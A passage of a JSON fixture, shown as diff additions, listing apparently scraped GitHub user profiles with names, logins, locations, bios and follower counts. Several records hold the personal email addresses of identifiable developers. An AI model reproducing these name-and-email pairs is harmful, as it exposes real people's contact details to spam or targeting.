"name": "Thibault \"bui\" Koechlin", + "login": "buixor", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/990714?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 7, + "followers_count": 91, + "public_gists_count": 1, + "public_repositories_count": 18, + "created_at": "2011-08-19T09:44:30Z", + "updated_at": "2024-06-19T07:48:08Z", + "node_id": "MDQ6VXNlcjk5MDcxNA==", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1133, + "fields": { + "nest_created_at": "2024-09-11T22:51:09.143Z", + "nest_updated_at": "2024-09-11T22:51:09.143Z", + "name": "Sundar N", + "login": "ns-sundar", + "email": "sundar.nadathur@intel.com", + "avatar_url": "https://avatars.githubusercontent.com/u/17782735?v=4", + "company": "", + "location": "Santa Clara, CA", + "collaborators_count": 0, + "following_count": 3, + "followers_count": 5, + "public_gists_count": 0, + "public_repositories_count": 7, + "created_at": "2016-03-11T12:00:06Z", + "updated_at": "2024-02-13T07:00:39Z", + "node_id": "MDQ6VXNlcjE3NzgyNzM1", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1134, + "fields": { + "nest_created_at": "2024-09-11T22:51:13.859Z", + "nest_updated_at": "2024-09-11T22:51:13.859Z", + "name": "Meisam Monsef", + "login": "meisamrce", + "email": "meisamrce@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/5562950?v=4", + "company": "", + "location": "Iran", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 76, + "public_gists_count": 0, + "public_repositories_count": 9, + "created_at": "2013-09-28T07:32:45Z", + "updated_at": "2024-08-25T13:04:15Z", + "node_id": "MDQ6VXNlcjU1NjI5NTA=", + "bio": "App & Web Developer - Vulnerability researcher ", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1135, + "fields": { + "nest_created_at": "2024-09-11T22:51:19.748Z", + "nest_updated_at": "2024-09-11T22:51:19.748Z", + "name": "Shivansh Verma", + "login": "VermaShivansh", + "email": "SHIVANSH29.SV@GMAIL.COM", + "avatar_url": "https://avatars.githubusercontent.com/u/75882684?v=4", + "company": "Ringover France", + "location": "Remote", + "collaborators_count": 0, + "following_count": 10, + "followers_count": 30, + "public_gists_count": 1, + "public_repositories_count": 46, + "created_at": "2020-12-12T10:30:59Z", + "updated_at": "2024-08-13T08:59:10Z", + "node_id": "MDQ6VXNlcjc1ODgyNjg0", + "bio": "Full-Stack Developer - ReactJs, NodeJs, Golang, GCP, AWS, Docker", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1136, + "fields": { + "nest_created_at": "2024-09-11T22:51:20.980Z", + "nest_updated_at": "2024-09-11T22:51:20.980Z", + "name": "Lxt3h", + "login": "Lexterl33t", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/44911576?v=4", + "company": "The Alchemist Co.", + "location": "/home/lxt3h/Desktop", + "collaborators_count": 0, + "following_count": 195, + "followers_count": 177, + "public_gists_count": 0, + "public_repositories_count": 152, + "created_at": "2018-11-09T23:00:34Z", + "updated_at": "2024-09-03T07:35:38Z", + "node_id": "MDQ6VXNlcjQ0OTExNTc2", + "bio": "Security researcher at Fuzzinglabs", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1137, + "fields": { + "nest_created_at": "2024-09-11T22:51:24.430Z", + "nest_updated_at": "2024-09-11T22:51:24.430Z", + "name": "键盘上的少侠", + "login": "sun-sun-sun", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/44592475?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 3, + "created_at": "2018-10-30T00:46:04Z", + "updated_at": "2023-04-06T02:57:33Z", + "node_id": "MDQ6VXNlcjQ0NTkyNDc1", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1138, + "fields": { + "nest_created_at": "2024-09-11T22:51:25.245Z", + "nest_updated_at": "2024-09-22T18:42:22.296Z", + "name": "", + "login": "blotus", + "email": "sebastien@blot.me", + "avatar_url": "https://avatars.githubusercontent.com/u/835060?v=4", + "company": "Crowdsec", + "location": "Paris", + "collaborators_count": 0, + "following_count": 12, + "followers_count": 68, + "public_gists_count": 1, + "public_repositories_count": 17, + "created_at": "2011-06-07T12:55:34Z", + "updated_at": "2024-09-11T21:32:24Z", + "node_id": "MDQ6VXNlcjgzNTA2MA==", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1139, + "fields": { + "nest_created_at": "2024-09-11T22:51:27.675Z", + "nest_updated_at": "2024-09-11T22:51:27.675Z", + "name": "Gary Stanley", + "login": "monkburger", + "email": "gary@cpanel.net", + "avatar_url": "https://avatars.githubusercontent.com/u/7066353?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 6, + "public_gists_count": 0, + "public_repositories_count": 20, + "created_at": "2014-03-26T05:35:18Z", + "updated_at": "2024-07-11T15:57:25Z", + "node_id": "MDQ6VXNlcjcwNjYzNTM=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1140, + "fields": { + "nest_created_at": "2024-09-11T22:51:31.741Z", + "nest_updated_at": "2024-09-11T22:51:32.977Z", + "name": "Bastien", + "login": "zeylos", + "email": "b.ogier@protonmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/24226163?v=4", + "company": "", + "location": "France", + "collaborators_count": 0, + "following_count": 5, + "followers_count": 3, + "public_gists_count": 0, + "public_repositories_count": 3, + "created_at": "2016-11-28T13:26:11Z", + "updated_at": "2023-12-13T14:15:08Z", + "node_id": "MDQ6VXNlcjI0MjI2MTYz", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1141, + "fields": { + "nest_created_at": "2024-09-11T22:51:36.278Z", + "nest_updated_at": "2024-09-11T22:51:36.278Z", + "name": "", + "login": "iMaxGit", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/9683389?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 2, + "created_at": "2014-11-11T21:38:32Z", + "updated_at": "2024-09-04T10:29:26Z", + "node_id": "MDQ6VXNlcjk2ODMzODk=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1142, + "fields": { + "nest_created_at": "2024-09-11T22:51:37.563Z", + "nest_updated_at": "2024-09-13T17:07:48.460Z", + "name": "", + "login": "Barnoux", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/47791676?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 2, + "created_at": "2019-02-19T17:56:31Z", + "updated_at": "2024-09-06T18:37:05Z", + "node_id": "MDQ6VXNlcjQ3NzkxNjc2", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1143, + "fields": { + "nest_created_at": "2024-09-11T22:51:39.600Z", + "nest_updated_at": "2024-09-22T16:36:11.196Z", + "name": "Mohit Joshi", + "login": "joshi-mohit", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/45808752?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 4, + "created_at": "2018-12-12T03:32:48Z", + "updated_at": "2024-09-16T15:06:43Z", + "node_id": "MDQ6VXNlcjQ1ODA4NzUy", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1144, + "fields": { + "nest_created_at": "2024-09-11T22:51:40.470Z", + "nest_updated_at": "2024-09-11T22:51:40.470Z", + "name": "Something Else", + "login": "brijeshjvalera", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/15683404?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2015-11-06T05:23:33Z", + "updated_at": "2024-06-26T10:45:56Z", + "node_id": "MDQ6VXNlcjE1NjgzNDA0", + "bio": "#coder #foodie", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1145, + "fields": { + "nest_created_at": "2024-09-11T22:51:41.284Z", + "nest_updated_at": "2024-09-11T22:51:41.284Z", + "name": "BitsGuardian", + "login": "gassonet9", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/150347486?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 2, + "created_at": "2023-11-09T11:49:15Z", + "updated_at": "2024-04-26T08:54:27Z", + "node_id": "U_kgDOCPYe3g", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1146, + "fields": { + "nest_created_at": "2024-09-11T22:51:42.497Z", + "nest_updated_at": "2024-09-11T22:51:42.497Z", + "name": "Mark Wakefield", + "login": "MrWako", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/9511058?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 8, + "followers_count": 14, + "public_gists_count": 0, + "public_repositories_count": 10, + "created_at": "2014-11-02T09:25:29Z", + "updated_at": "2024-04-25T20:07:36Z", + "node_id": "MDQ6VXNlcjk1MTEwNTg=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1147, + "fields": { + "nest_created_at": "2024-09-11T22:51:43.304Z", + "nest_updated_at": "2024-09-18T18:54:46.565Z", + "name": "", + "login": "nanchen114", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/59383756?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2019-12-31T05:35:41Z", + "updated_at": "2023-03-26T14:09:10Z", + "node_id": "MDQ6VXNlcjU5MzgzNzU2", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1148, + "fields": { + "nest_created_at": "2024-09-11T22:51:44.565Z", + "nest_updated_at": "2024-09-11T22:51:44.565Z", + "name": "Yves Galante", + "login": "YvesZelros", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/97048025?v=4", + "company": "@zelros ", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 4, + "created_at": "2022-01-03T17:17:57Z", + "updated_at": "2024-04-04T14:54:20Z", + "node_id": "U_kgDOBcjV2Q", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1149, + "fields": { + "nest_created_at": "2024-09-11T22:51:46.724Z", + "nest_updated_at": "2024-09-11T22:51:53.712Z", + "name": "s3rj1k", + "login": "s3rj1k", + "email": "evasive.gyron@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/11349489?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 20, + "followers_count": 36, + "public_gists_count": 2, + "public_repositories_count": 77, + "created_at": "2015-03-06T11:59:54Z", + "updated_at": "2024-05-22T22:29:14Z", + "node_id": "MDQ6VXNlcjExMzQ5NDg5", + "bio": "", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1150, + "fields": { + "nest_created_at": "2024-09-11T22:51:48.337Z", + "nest_updated_at": "2024-09-11T22:51:48.337Z", + "name": "Sylvain Muller", + "login": "tigerwill90", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/26261762?v=4", + "company": "Fincons Group", + "location": "Switzerland, Geneva", + "collaborators_count": 0, + "following_count": 10, + "followers_count": 9, + "public_gists_count": 0, + "public_repositories_count": 42, + "created_at": "2017-03-07T21:58:56Z", + "updated_at": "2024-08-04T11:49:40Z", + "node_id": "MDQ6VXNlcjI2MjYxNzYy", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1151, + "fields": { + "nest_created_at": "2024-09-11T22:51:52.122Z", + "nest_updated_at": "2024-09-11T22:51:52.122Z", + "name": "", + "login": "svenakela", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/1113187?v=4", + "company": "", + "location": "Hawai'i, Sweden", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 4, + "public_gists_count": 7, + "public_repositories_count": 26, + "created_at": "2011-10-08T22:53:20Z", + "updated_at": "2024-05-16T09:29:09Z", + "node_id": "MDQ6VXNlcjExMTMxODc=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1152, + "fields": { + "nest_created_at": "2024-09-11T22:51:52.909Z", + "nest_updated_at": "2024-09-22T18:42:21.672Z", + "name": "", + "login": "jabdr", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/803604?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 4, + "public_gists_count": 0, + "public_repositories_count": 6, + "created_at": "2011-05-22T15:49:15Z", + "updated_at": "2024-08-07T17:23:58Z", + "node_id": "MDQ6VXNlcjgwMzYwNA==", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1153, + "fields": { + "nest_created_at": "2024-09-11T22:51:55.452Z", + "nest_updated_at": "2024-09-20T17:50:33.337Z", + "name": "Muhamad Surya Iksanudin", + "login": "ad3n", + "email": "surya.kejawen@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/7464920?v=4", + "company": "@KejawenLab ", + "location": "Jakarta, Indonesia", + "collaborators_count": 0, + "following_count": 5, + "followers_count": 180, + "public_gists_count": 26, + "public_repositories_count": 338, + "created_at": "2014-05-02T07:20:09Z", + "updated_at": "2024-08-14T14:17:06Z", + "node_id": "MDQ6VXNlcjc0NjQ5MjA=", + "bio": "Solution Architect, System Analyst, and Backend Developer\r\n", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1154, + "fields": { + "nest_created_at": "2024-09-11T22:52:24.182Z", + "nest_updated_at": "2024-09-22T20:29:52.023Z", + "name": "Daniel Gredler", + "login": "gredler", + "email": "daniel.gredler@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/178883?v=4", + "company": "", + "location": "Atlanta", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 8, + "public_gists_count": 1, + "public_repositories_count": 20, + "created_at": "2010-01-09T01:19:08Z", + "updated_at": "2024-08-31T21:14:27Z", + "node_id": "MDQ6VXNlcjE3ODg4Mw==", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1155, + "fields": { + "nest_created_at": "2024-09-11T22:52:27.524Z", + "nest_updated_at": "2024-09-22T18:42:36.196Z", + "name": "Raja Nagori", + "login": "RAJANAGORI", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/32300516?v=4", + "company": "Splunk", + "location": "Hyderabad, India", + "collaborators_count": 0, + "following_count": 31, + "followers_count": 60, + "public_gists_count": 35, + "public_repositories_count": 54, + "created_at": "2017-09-26T13:06:17Z", + "updated_at": "2024-08-17T07:18:45Z", + "node_id": "MDQ6VXNlcjMyMzAwNTE2", + "bio": "Cyber Security Expert | Dev-Sec-Ops | Mobile App-Sec | Web App-Sec | Network VAPT | Automation", + "is_hireable": true, + "twitter_username": "RajaNagori7" + } +}, +{ + "model": "github.user", + "pk": 1156, + "fields": { + "nest_created_at": "2024-09-11T22:52:36.142Z", + "nest_updated_at": "2024-09-22T18:42:36.509Z", + "name": "Jinesh Nagori", + "login": "jineshnagori", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/71936891?v=4", + "company": "", + "location": "India ", + "collaborators_count": 0, + "following_count": 4, + "followers_count": 41, + "public_gists_count": 1, + "public_repositories_count": 77, + "created_at": "2020-09-26T15:27:55Z", + "updated_at": "2024-08-26T12:17:06Z", + "node_id": "MDQ6VXNlcjcxOTM2ODkx", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1157, + "fields": { + "nest_created_at": "2024-09-11T22:52:57.894Z", + "nest_updated_at": "2024-09-11T22:52:57.894Z", + "name": "Shlok Pandit", + "login": "Dr-Savage", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/42646403?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 3, + "followers_count": 2, + "public_gists_count": 0, + "public_repositories_count": 7, + "created_at": "2018-08-23T14:07:15Z", + "updated_at": "2024-09-02T07:47:28Z", + "node_id": "MDQ6VXNlcjQyNjQ2NDAz", + "bio": ".", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1158, + "fields": { + "nest_created_at": "2024-09-11T22:53:17.742Z", + "nest_updated_at": "2024-09-22T20:28:09.031Z", + "name": "Jeremy Druin", + "login": "webpwnized", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/12465192?v=4", + "company": "Ellipsis Information Security LLC", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 201, + "public_gists_count": 0, + "public_repositories_count": 24, + "created_at": "2015-05-15T19:26:23Z", + "updated_at": "2024-09-15T11:29:43Z", + "node_id": "MDQ6VXNlcjEyNDY1MTky", + "bio": "", + "is_hireable": false, + "twitter_username": "webpwnized" + } +}, +{ + "model": "github.user", + "pk": 1159, + "fields": { + "nest_created_at": "2024-09-11T22:53:20.628Z", + "nest_updated_at": "2024-09-22T18:42:40.756Z", + "name": "tanhx", + "login": "tanhx", + "email": "tan.hx@163.com", + "avatar_url": "https://avatars.githubusercontent.com/u/1335838?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 2, + "created_at": "2012-01-17T06:33:19Z", + "updated_at": "2024-04-24T08:23:17Z", + "node_id": "MDQ6VXNlcjEzMzU4Mzg=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1160, + "fields": { + "nest_created_at": "2024-09-11T22:53:21.460Z", + "nest_updated_at": "2024-09-13T05:21:06.901Z", + "name": "", + "login": "xxgumn", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/180929174?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2024-09-09T07:55:49Z", + "updated_at": "2024-09-09T07:56:15Z", + "node_id": "U_kgDOCsjClg", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1161, + "fields": { + "nest_created_at": "2024-09-11T22:53:50.312Z", + "nest_updated_at": "2024-09-22T18:53:34.680Z", + "name": "CycloneDX SBOM Standard", + "login": "CycloneDX", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/29029855?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 493, + "public_gists_count": 0, + "public_repositories_count": 57, + "created_at": "2017-05-29T01:46:39Z", + "updated_at": "2024-09-01T11:32:48Z", + "node_id": "MDEyOk9yZ2FuaXphdGlvbjI5MDI5ODU1", + "bio": "CycloneDX is a modern standard for the software supply chain. SBOM, SaaSBOM, OBOM, Advisories, VEX, and more. CycloneDX is a OWASP Flagship Project.", + "is_hireable": false, + "twitter_username": "CycloneDX_Spec" + } +}, +{ + "model": "github.user", + "pk": 1162, + "fields": { + "nest_created_at": "2024-09-11T22:54:04.083Z", + "nest_updated_at": "2024-09-22T19:42:33.538Z", + "name": "Mark Symons", + "login": "msymons", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/4938718?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 5, + "followers_count": 6, + "public_gists_count": 2, + "public_repositories_count": 15, + "created_at": "2013-07-04T10:08:07Z", + "updated_at": "2024-07-09T10:35:38Z", + "node_id": "MDQ6VXNlcjQ5Mzg3MTg=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1163, + "fields": { + "nest_created_at": "2024-09-11T22:54:08.185Z", + "nest_updated_at": "2024-09-22T18:53:28.874Z", + "name": "Matt Rutkowski", + "login": "mrutkows", + "email": "mrutkows@us.ibm.com", + "avatar_url": "https://avatars.githubusercontent.com/u/7816715?v=4", + "company": "IBM", + "location": "Austin", + "collaborators_count": 0, + "following_count": 21, + "followers_count": 37, + "public_gists_count": 0, + "public_repositories_count": 122, + "created_at": "2014-06-06T14:57:37Z", + "updated_at": "2024-04-11T15:07:20Z", + "node_id": "MDQ6VXNlcjc4MTY3MTU=", + "bio": "STSM, Open Source Supply Chain Security (OSSCS)", + "is_hireable": false, + "twitter_username": "mattrutkowski91" + } +}, +{ + "model": "github.user", + "pk": 1164, + "fields": { + "nest_created_at": "2024-09-11T22:54:09.007Z", + "nest_updated_at": "2024-09-11T22:54:09.007Z", + "name": "", + "login": "VladimirBoiko", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/17159937?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2016-02-10T12:15:15Z", + "updated_at": "2021-07-28T12:19:30Z", + "node_id": "MDQ6VXNlcjE3MTU5OTM3", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1165, + "fields": { + "nest_created_at": "2024-09-11T22:54:09.815Z", + "nest_updated_at": "2024-09-11T22:54:09.815Z", + "name": "", + "login": "tomekkolo", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/38069337?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 2, + "public_gists_count": 0, + "public_repositories_count": 8, + "created_at": "2018-04-04T09:37:38Z", + "updated_at": "2024-05-22T16:36:48Z", + "node_id": "MDQ6VXNlcjM4MDY5MzM3", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1166, + "fields": { + "nest_created_at": "2024-09-11T22:54:10.641Z", + "nest_updated_at": "2024-09-22T18:43:50.341Z", + "name": "vivek kumar sahu", + "login": "viveksahu26", + "email": "vivekkumarsahu650@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/65091408?v=4", + "company": "Open Source Developer", + "location": "Indore", + "collaborators_count": 0, + "following_count": 80, + "followers_count": 12, + "public_gists_count": 2, + "public_repositories_count": 83, + "created_at": "2020-05-09T20:26:17Z", + "updated_at": "2024-09-16T16:11:23Z", + "node_id": "MDQ6VXNlcjY1MDkxNDA4", + "bio": " :heart: open source | Working on Software Supply Chain Security @interlynk-io | Ex-Contributor @kyverno | Golang", + "is_hireable": false, + "twitter_username": "viveksahu_26" + } +}, +{ + "model": "github.user", + "pk": 1167, + "fields": { + "nest_created_at": "2024-09-11T22:54:24.473Z", + "nest_updated_at": "2024-09-12T01:25:15.230Z", + "name": "Michele", + "login": "mvanini", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/15686067?v=4", + "company": "", + "location": "Italy", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 1, + "public_gists_count": 1, + "public_repositories_count": 10, + "created_at": "2015-11-06T09:18:50Z", + "updated_at": "2024-09-10T08:27:54Z", + "node_id": "MDQ6VXNlcjE1Njg2MDY3", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1168, + "fields": { + "nest_created_at": "2024-09-11T22:54:25.323Z", + "nest_updated_at": "2024-09-12T01:27:15.895Z", + "name": "SR", + "login": "navulirs", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/4923947?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 26, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 60, + "created_at": "2013-07-02T19:09:40Z", + "updated_at": "2024-07-11T22:03:30Z", + "node_id": "MDQ6VXNlcjQ5MjM5NDc=", + "bio": "A Nomad!!", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1169, + "fields": { + "nest_created_at": "2024-09-11T22:54:26.147Z", + "nest_updated_at": "2024-09-12T03:16:19.957Z", + "name": "Bozidar Spirovski", + "login": "spirovskib", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/14974055?v=4", + "company": "BeyondMachines", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2015-10-05T08:09:20Z", + "updated_at": "2024-08-31T16:02:57Z", + "node_id": "MDQ6VXNlcjE0OTc0MDU1", + "bio": "Building Strong Cybersecurity in SaaS and Startups | Developing Successful Teams | Mentoring Young Engineers | Coding various ideas (probably badly)", + "is_hireable": false, + "twitter_username": "spirovskib" + } +}, +{ + "model": "github.user", + "pk": 1170, + "fields": { + "nest_created_at": "2024-09-11T22:54:27.004Z", + "nest_updated_at": "2024-09-11T22:54:27.004Z", + "name": "David", + "login": "dmuse89", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/9056454?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 5, + "public_gists_count": 0, + "public_repositories_count": 2, + "created_at": "2014-10-07T18:38:48Z", + "updated_at": "2024-01-05T10:34:05Z", + "node_id": "MDQ6VXNlcjkwNTY0NTQ=", + "bio": "IT-Security Engineer. Technical Editor.", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1171, + "fields": { + "nest_created_at": "2024-09-11T22:54:28.638Z", + "nest_updated_at": "2024-09-11T22:54:28.638Z", + "name": "Thiéfaine Mercier", + "login": "ThiefaineM", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/81707210?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2021-03-31T17:34:05Z", + "updated_at": "2024-03-02T13:29:39Z", + "node_id": "MDQ6VXNlcjgxNzA3MjEw", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1172, + "fields": { + "nest_created_at": "2024-09-11T22:54:29.451Z", + "nest_updated_at": "2024-09-22T19:29:10.315Z", + "name": "Craig Andrews", + "login": "candrews", + "email": "candrews@integralblue.com", + "avatar_url": "https://avatars.githubusercontent.com/u/194713?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 85, + "public_gists_count": 2, + "public_repositories_count": 261, + "created_at": "2010-02-02T18:48:08Z", + "updated_at": "2024-09-04T11:19:29Z", + "node_id": "MDQ6VXNlcjE5NDcxMw==", + "bio": "https://candrews.integralblue.com", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1173, + "fields": { + "nest_created_at": "2024-09-11T22:54:30.305Z", + "nest_updated_at": "2024-09-12T00:28:56.521Z", + "name": "", + "login": "2013kaa", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/46608135?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 2, + "created_at": "2019-01-11T18:52:34Z", + "updated_at": "2024-07-08T19:30:23Z", + "node_id": "MDQ6VXNlcjQ2NjA4MTM1", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1174, + "fields": { + "nest_created_at": "2024-09-11T22:54:41.559Z", + "nest_updated_at": "2024-09-11T22:54:41.559Z", + "name": "", + "login": "anujeyaraj", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/36725181?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 3, + "created_at": "2018-02-22T07:18:38Z", + "updated_at": "2022-08-22T15:38:50Z", + "node_id": "MDQ6VXNlcjM2NzI1MTgx", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1175, + "fields": { + "nest_created_at": "2024-09-11T22:54:44.899Z", + "nest_updated_at": "2024-09-16T22:28:39.226Z", + "name": "", + "login": "g-sahil22", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/100830439?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2022-03-03T07:23:11Z", + "updated_at": "2024-04-23T09:13:13Z", + "node_id": "U_kgDOBgKM5w", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1176, + "fields": { + "nest_created_at": "2024-09-11T22:54:45.718Z", + "nest_updated_at": "2024-09-22T19:35:13.191Z", + "name": "Chris Fort", + "login": "37b", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/17730030?v=4", + "company": "LexisNexis", + "location": "Apex, NC", + "collaborators_count": 0, + "following_count": 6, + "followers_count": 2, + "public_gists_count": 0, + "public_repositories_count": 5, + "created_at": "2016-03-08T18:59:08Z", + "updated_at": "2024-05-03T17:24:56Z", + "node_id": "MDQ6VXNlcjE3NzMwMDMw", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": 